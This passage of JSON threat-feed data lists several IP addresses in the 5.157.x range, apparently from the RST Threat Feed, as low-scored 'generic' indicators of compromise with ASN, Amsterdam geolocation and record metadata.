"d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "90769dc5c5c6b87610354b0a4a2856dba78fd0a88b6b28ae0690dda0b1d43a94", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.60.163"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Amsterdam", "country": "Netherlands", "region": "North Holland"}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.58.0", "num": "94190080"}, "isp": "AS41564", "lastip": {"netv4": "5.157.63.255", "num": "94191615"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:6E541C23-A3DA-3BA7-B482-E53938E92197", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.60.181", "description": "Found **5[.]157.60.181** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.58.0, Last IP 5.157.63.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"Amsterdam\", Country \"Netherlands\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "3bcaa00b4f4c028a619e463ac20e9e4f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "94511e135146da1c055a7f1eb305d8a0"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "134d27a72b96eb0a8d58caecda4cb44e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "6b5c19c46a30025e0718bbcafb608283"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "486a80dab5f7838c17da839a05abe9b0"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "64b5ae39a851a8bb3fdf17c4c1a5407455b6e082f7e22b2c16a5ed8aa48f0a9b", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.60.181"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Amsterdam", "country": "Netherlands", "region": "North Holland"}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.58.0", "num": "94190080"}, "isp": "AS41564", "lastip": {"netv4": "5.157.63.255", "num": "94191615"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:0461A1DB-B124-3F70-8E16-34E662A888AE", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.61.160", "description": "Found **5[.]157.61.160** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-11T03:00:00, Last seen: 2021-03-11T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.58.0, Last IP 5.157.63.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"Amsterdam\", Country \"Netherlands\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-11T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "3bcaa00b4f4c028a619e463ac20e9e4f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "2fea7fca4e3ce0b44009ee59af343a76"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "134d27a72b96eb0a8d58caecda4cb44e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "2dc740a7b3473eb6102ccf8004d0b4ff"}, {"key": "modified", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "ce83c42ad53a387232b68c62d474848c"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "c08b442ac83fa6e804d5e19f640fe5dbe75175ce93fa611d0a8e4f5a085740bb", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.61.160"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Amsterdam", "country": "Netherlands", "region": "North Holland"}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.58.0", "num": "94190080"}, "isp": "AS41564", "lastip": {"netv4": "5.157.63.255", "num": "94191615"}, "num": 41564, "org": ""}, "threat": []}]}